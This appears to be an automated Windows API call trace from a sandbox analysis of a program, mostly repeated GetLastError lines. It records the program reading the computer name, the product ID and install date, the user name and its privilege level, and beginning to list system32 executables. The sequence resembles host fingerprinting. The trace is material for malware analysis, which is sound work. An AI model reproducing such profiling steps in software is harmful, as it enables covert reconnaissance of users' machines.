	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.973] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.974] GetLastError () returned 0x5
	[0069.991] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0069.991] GetModuleHandleW (lpModuleName=0x0) returned 0x400000
	[0069.991] GetVersion () returned 0x23f00206
	[0069.991] GetCurrentProcessId () returned 0xdb0
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.991] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetLastError () returned 0x5
	[0069.992] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0069.992] GetProcAddress (hModule=0x765a0000, lpProcName="VirtualQuery") returned 0x765b7a90
	[0069.992] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0069.992] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0069.992] GetNativeSystemInfo (in: lpSystemInfo=0x25afa70 | out: lpSystemInfo=0x25afa70*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0069.993] GetComputerNameW (in: lpBuffer=0x71bd58, nSize=0x25afae0 | out: lpBuffer="X2VS1CUM", nSize=0x25afae0) returned 1
	[0069.993] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x25afab4 | out: phkResult=0x25afab4*=0x1f0) returned 0x0
	[0069.993] RegQueryValueExA (in: hKey=0x1f0, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x729540, lpcbData=0x25afab8*=0xc8 | out: lpType=0x0, lpData=0x729540*=0xa4, lpcbData=0x25afab8*=0xa4) returned 0x0
	[0069.993] RegQueryValueExA (in: hKey=0x1f0, lpValueName="InstallDate", lpReserved=0x0, lpType=0x0, lpData=0x25afaa8, lpcbData=0x25afab8*=0x4 | out: lpType=0x0, lpData=0x25afaa8*=0x3f, lpcbData=0x25afab8*=0x4) returned 0x0
	[0069.993] RegCloseKey (hKey=0x1f0) returned 0x0
	[0069.993] lstrlenA (lpString="00342-50487-12048-AAOEM") returned 23
	[0069.993] GetComputerNameA (in: lpBuffer=0x728028, nSize=0x25afab8 | out: lpBuffer="X2VS1CUM", nSize=0x25afab8) returned 1
	[0069.993] lstrlenA (lpString="X2VS1CUM") returned 8
	[0069.993] IsUserAnAdmin () returned 0
	[0069.993] CreateWellKnownSid (in: WellKnownSidType=0x27, DomainSid=0x0, pSid=0x25afaa8, cbSid=0x25afab4 | out: pSid=0x25afaa8*(Revision=0x0, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x81, [1]=0x59, [2]=0x43, [3]=0x63, [4]=0xd5, [5]=0x7d), SubAuthority=([0]=0xf0, [1]=0xfa, [2]=0x5a, [3]=0x2, [4]=0xc)), cbSid=0x25afab4) returned 0
	[0069.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x25afa40 | out: TokenHandle=0x25afa40*=0x1f4) returned 1
	[0069.994] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25afa48 | out: TokenInformation=0x0, ReturnLength=0x25afa48) returned 0
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetTokenInformation (in: TokenHandle=0x1f4, TokenInformationClass=0x19, TokenInformation=0x728998, TokenInformationLength=0x14, ReturnLength=0x25afa48 | out: TokenInformation=0x728998, ReturnLength=0x25afa48) returned 1
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.994] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetLastError () returned 0x7a
	[0069.995] GetSidSubAuthorityCount (pSid=0x7289a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x7289a1
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetLastError () returned 0x0
	[0069.995] GetSidSubAuthority (pSid=0x7289a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x7289a8
	[0069.996] CloseHandle (hObject=0x1f4) returned 1
	[0069.996] GetUserNameW (in: lpBuffer=0x25afb08, pcbBuffer=0x25afdbc | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x25afdbc) returned 1
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.996] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] SetEnvironmentVariableW (lpName="USERNAME", lpValue="Nd9E1FYi") returned 1
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] GetLastError () returned 0x0
	[0069.997] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0069.998] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcess") returned 0x779d6f00
	[0069.998] NtOpenProcess (in: ProcessHandle=0x25afa50, DesiredAccess=0x400, ObjectAttributes=0x25afa20*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x25afa38*(UniqueProcess=0xdb0, UniqueThread=0x0) | out: ProcessHandle=0x25afa50*=0x1f4) returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] GetLastError () returned 0x0
	[0069.998] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0069.999] GetProcAddress (hModule=0x77960000, lpProcName="ZwOpenProcessToken") returned 0x779d7e10
	[0069.999] NtOpenProcessToken (in: ProcessHandle=0x1f4, DesiredAccess=0x8, TokenHandle=0x25afa64 | out: TokenHandle=0x25afa64*=0x1f0) returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] GetLastError () returned 0x0
	[0069.999] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0070.000] GetProcAddress (hModule=0x77960000, lpProcName="ZwQueryInformationToken") returned 0x779d6eb0
	[0070.000] NtQueryInformationToken (in: TokenHandle=0x1f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x25afad4 | out: TokenInformation=0x0, ReturnLength=0x25afad4) returned 0xc0000023
	[0070.000] NtQueryInformationToken (in: TokenHandle=0x1f0, TokenInformationClass=0x1, TokenInformation=0x72b890, TokenInformationLength=0x24, ReturnLength=0x25afad4 | out: TokenInformation=0x72b890, ReturnLength=0x25afad4) returned 0x0
	[0070.000] CloseHandle (hObject=0x1f0) returned 1
	[0070.000] CloseHandle (hObject=0x1f4) returned 1
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.000] GetLastError () returned 0x0
	[0070.001] GetLastError () returned 0x0
	[0070.001] GetLastError () returned 0x0
	[0070.001] GetLastError () returned 0x0
	[0070.001] GetLastError () returned 0x0
	[0070.001] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.001] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.001] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726a00
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.001] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.002] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
